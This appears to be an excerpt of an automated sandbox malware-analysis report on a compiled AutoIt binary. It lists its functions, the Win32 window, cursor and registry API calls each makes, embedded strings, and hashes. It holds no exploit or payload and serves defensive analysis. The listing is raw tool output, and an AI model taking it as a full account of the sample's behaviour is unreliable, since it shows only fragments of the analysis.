                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: de0b57788f423d3a4420bd59e4ef098c5b26168cb624ef2407952087d024fcd2
                                    • Instruction ID: 8f72f958d7a00d0a971f5d197274771861ad16fbdc85478f68d1705e63090808
                                    • Opcode Fuzzy Hash: de0b57788f423d3a4420bd59e4ef098c5b26168cb624ef2407952087d024fcd2
                                    • Instruction Fuzzy Hash: 6F514B72901208AFDF11DFE9DC48AAE7B79FB08320F104615FA15AB2A1DB759A42CB50
                                    Function 009EB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009EB7B0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB7C1
                                    • CharNextW.USER32(0000014E), ref: 009EB7F0
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009EB831
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009EB847
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB858
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 009EB875
                                    • SetWindowTextW.USER32(?,0000014E), ref: 009EB8C7
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 009EB8DD
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 009EB90E
                                    • _memset.LIBCMT ref: 009EB933
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 009EB97C
                                    • _memset.LIBCMT ref: 009EB9DB
                                    • SendMessageW.USER32 ref: 009EBA05
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 009EBA5D
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 009EBB0A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 009EBB2C
                                    • GetMenuItemInfoW.USER32(?), ref: 009EBB76
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009EBBA3
                                    • DrawMenuBar.USER32(?), ref: 009EBBB2
                                    • SetWindowTextW.USER32(?,0000014E), ref: 009EBBDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: adbfc5d8f2f07508811f0b081fc9aab625c45ba3536e667f821e7322701b7173
                                    • Instruction ID: 5e697ceb5d405155a16b8dcdba2f4fe92173f1dd9be55fa842c45428c5e82e3e
                                    • Opcode Fuzzy Hash: adbfc5d8f2f07508811f0b081fc9aab625c45ba3536e667f821e7322701b7173
                                    • Instruction Fuzzy Hash: E6E1BF75900258ABDF22CFA2CC84AEF7B78FF45710F148156FA19AA291D7758E42CF60
                                    Function 009E764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 009E778A
                                    • GetDesktopWindow.USER32 ref: 009E779F
                                    • GetWindowRect.USER32(00000000), ref: 009E77A6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009E7808
                                    • DestroyWindow.USER32(?), ref: 009E7834
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009E785D
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009E787B
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009E78A1
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 009E78B6
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009E78C9
                                    • IsWindowVisible.USER32(?), ref: 009E78E9
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 009E7904
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 009E7918
                                    • GetWindowRect.USER32(?,?), ref: 009E7930
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 009E7956
                                    • GetMonitorInfoW.USER32 ref: 009E7970
                                    • CopyRect.USER32(?,?), ref: 009E7987
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 009E79F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
                                    • Instruction ID: b38087716298c4adc6a63f92e2187a8abfd89031a5f056d15bb6f610c37bf45e
                                    • Opcode Fuzzy Hash: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
                                    • Instruction Fuzzy Hash: 6CB16A71608341AFDB05DFA5C988B6AFBE5BF88310F00891DF5999B291DB71EC05CB92
                                    Function 009C6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat$D315$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                    • API String ID: 2463055960-1459072770
                                    • Opcode ID: f9079e5deb8b8512d753046cfa5c7deda4d7c33b58af2d883547344e40084871
                                    • Instruction ID: f9015f5ac8b8c7d3e98471c94a52ebbdf3454900a3570d281fcc99a7cf45682a
                                    • Opcode Fuzzy Hash: f9079e5deb8b8512d753046cfa5c7deda4d7c33b58af2d883547344e40084871
                                    • Instruction Fuzzy Hash: FE41D972A002047BEB00AB78DC47FBF777CEF86710F044869F905E6182EB759A01D6A6
                                    Function 0099A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A939
                                    • GetSystemMetrics.USER32(00000007), ref: 0099A941
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A96C
                                    • GetSystemMetrics.USER32(00000008), ref: 0099A974
                                    • GetSystemMetrics.USER32(00000004), ref: 0099A999
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0099A9B6
                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0099A9C6
                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0099A9F9
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0099AA0D
                                    • GetClientRect.USER32(00000000,000000FF), ref: 0099AA2B
                                    • GetStockObject.GDI32(00000011), ref: 0099AA47
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0099AA52
                                      • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
                                      • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                    • SetTimer.USER32(00000000,00000000,00000028,0099AB87), ref: 0099AA79
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: dd4699112f2312702ccdfe2d859653ed77b593780b89eead1d50c6b8200ec006
                                    • Instruction ID: 0f915360ab4d3edfa2e098a95ee6bb7a8bbb97a28c30b07d64f3928cd11995dc
                                    • Opcode Fuzzy Hash: dd4699112f2312702ccdfe2d859653ed77b593780b89eead1d50c6b8200ec006
                                    • Instruction Fuzzy Hash: D4B1AB75A0120AAFDF14DFE8CC45BAE7BB9FB48310F114219FA05A7290DB74E842CB51
                                    Function 00982EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Foreground
                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                    • API String ID: 62970417-1919597938
                                    • Opcode ID: f3e8d2026210d10540b91755556e12f3dfc899920839c78f0e7e9839d7ba7013
                                    • Instruction ID: 13b940f9405b37b708a876ca11645d4c838bf6994b42116efedd5da0a24067f1
                                    • Opcode Fuzzy Hash: f3e8d2026210d10540b91755556e12f3dfc899920839c78f0e7e9839d7ba7013
                                    • Instruction Fuzzy Hash: E7D1E93050874A9BCB04EF64C481BBAFBB4BF94344F104D1DF596572A1DB70E99ACB91
                                    Function 009E3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E3735
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A1DC00,00000000,?,00000000,?,?), ref: 009E37A3
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009E37EB
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009E3874
                                    • RegCloseKey.ADVAPI32(?), ref: 009E3B94
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E3BA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 35b556efe40391521ec300d851f40fc14995bb32aac3b762b93ceb4d9ae4ba01
                                    • Instruction ID: a74a01645ad5fc439addcb9b2409b3b47d7d460a42b7234f350d1f3aee2c5d81
                                    • Opcode Fuzzy Hash: 35b556efe40391521ec300d851f40fc14995bb32aac3b762b93ceb4d9ae4ba01
                                    • Instruction Fuzzy Hash: EB025C75604601AFCB15EF25C855B2AB7E9FF88720F04895DF98A9B3A1DB30ED01CB81
                                    Function 009E6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 009E6C56
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009E6D16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: ed003bdfd12ee19a5f188212cbd6e681eb54bf0a2ccdd521dc60f74ac95e3a84
                                    • Instruction ID: d973d500831b5122c3fc3b6826206b6d848c6801b72f08e223082276e6dfc83a
                                    • Opcode Fuzzy Hash: ed003bdfd12ee19a5f188212cbd6e681eb54bf0a2ccdd521dc60f74ac95e3a84
                                    • Instruction Fuzzy Hash: A2A16C302043819BCB15EF25C951B7AB7A5BF94354F144D6DB8A69B3D2EB30ED06CB81
                                    Function 009BCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 009BCF91
                                    • __swprintf.LIBCMT ref: 009BD032
                                    • _wcscmp.LIBCMT ref: 009BD045
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009BD09A
                                    • _wcscmp.LIBCMT ref: 009BD0D6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 009BD10D
                                    • GetDlgCtrlID.USER32(?), ref: 009BD15F
                                    • GetWindowRect.USER32(?,?), ref: 009BD195
                                    • GetParent.USER32(?), ref: 009BD1B3
                                    • ScreenToClient.USER32(00000000), ref: 009BD1BA
                                    • GetClassNameW.USER32(?,?,00000100), ref: 009BD234
                                    • _wcscmp.LIBCMT ref: 009BD248
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 009BD26E
                                    • _wcscmp.LIBCMT ref: 009BD282
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                    • String ID: %s%u
                                    • API String ID: 3119225716-679674701
                                    • Opcode ID: c9b520f1eb9b94b3279773095465551a340d1a66c51bddb7f6d4bcd2dc13ac92
                                    • Instruction ID: 080c628afe86bf42916cd2429681baa3f7fe728cfa1fbfe779269da2b640fd02
                                    • Opcode Fuzzy Hash: c9b520f1eb9b94b3279773095465551a340d1a66c51bddb7f6d4bcd2dc13ac92
                                    • Instruction Fuzzy Hash: A0A1D271609746AFD714DF64C984FEAB7ACFF44324F008529F9A9D2180EB30EA46CB91
                                    Function 009BD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 009BD8EB
                                    • _wcscmp.LIBCMT ref: 009BD8FC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 009BD924
                                    • CharUpperBuffW.USER32(?,00000000), ref: 009BD941
                                    • _wcscmp.LIBCMT ref: 009BD95F
                                    • _wcsstr.LIBCMT ref: 009BD970
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 009BD9A8
                                    • _wcscmp.LIBCMT ref: 009BD9B8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 009BD9DF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 009BDA28
                                    • _wcscmp.LIBCMT ref: 009BDA38
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 009BDA60
                                    • GetWindowRect.USER32(00000004,?), ref: 009BDAC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: a51be4e14e13e303e8f09f4c94aadac2487fedf5a938f292345c7a8190398021
                                    • Instruction ID: be29b361940a160bb5f5bbfe7a42c6810616dc1783eae9165f1611569806acd6
                                    • Opcode Fuzzy Hash: a51be4e14e13e303e8f09f4c94aadac2487fedf5a938f292345c7a8190398021
                                    • Instruction Fuzzy Hash: B681A1710093059BDB05DF50CA85FAA7BECFF84724F04846AFD899A096EB34DD46CBA1
                                    Function 009BD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: c24cb4247e88384c7ede4af03dd296ca96d0abd453927c2f01b836033459851a
                                    • Instruction ID: 580fdd453cc67fb99e770f8fd61c9e3e7cef68d88c0b239b1cbeedbe2635f154
                                    • Opcode Fuzzy Hash: c24cb4247e88384c7ede4af03dd296ca96d0abd453927c2f01b836033459851a
                                    • Instruction Fuzzy Hash: 80316C71644205BADB14FE60DE93FEDB7B8AFA1721F200929F441B51D1FF61AA04C791
                                    Function 009BEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 009BEAB0
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009BEAC2
                                    • SetWindowTextW.USER32(?,?), ref: 009BEAD9
                                    • GetDlgItem.USER32(?,000003EA), ref: 009BEAEE
                                    • SetWindowTextW.USER32(00000000,?), ref: 009BEAF4
                                    • GetDlgItem.USER32(?,000003E9), ref: 009BEB04
                                    • SetWindowTextW.USER32(00000000,?), ref: 009BEB0A
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009BEB2B
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009BEB45
                                    • GetWindowRect.USER32(?,?), ref: 009BEB4E
                                    • SetWindowTextW.USER32(?,?), ref: 009BEBB9
                                    • GetDesktopWindow.USER32 ref: 009BEBBF
                                    • GetWindowRect.USER32(00000000), ref: 009BEBC6
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 009BEC12
                                    • GetClientRect.USER32(?,?), ref: 009BEC1F
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 009BEC44
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009BEC6F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
                                    • Instruction ID: f9887f3b7c5d3919123212fbbe7eb56e5e6a81dccf74d890c97571a7bd8d9e25
                                    • Opcode Fuzzy Hash: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
                                    • Instruction Fuzzy Hash: A4515E71900709EFDB20DFA9CE89FAEBBF9FF04714F004928E586A25A0C775A945CB10
                                    Function 009D79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 009D79C6
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 009D79D1
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 009D79DC
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 009D79E7
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 009D79F2
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 009D79FD
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 009D7A08
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 009D7A13
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 009D7A1E
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 009D7A29
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 009D7A34
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 009D7A3F
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 009D7A4A
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 009D7A55
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 009D7A60
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 009D7A6B
                                    • GetCursorInfo.USER32(?), ref: 009D7A7B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$Info
                                    • String ID:
                                    • API String ID: 2577412497-0
                                    • Opcode ID: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
                                    • Instruction ID: 4889320b8dae02412392c64887128148b6a97664290678dc9a5f216c074e3d4a
                                    • Opcode Fuzzy Hash: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
                                    • Instruction Fuzzy Hash: BC31E1B1D4831A6ADB109FF68C8995FFEECFB04750F50452BA50DA7280EA78A5018FA1
                                    Function 0098C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                    Download Yara Rule
                                    APIs
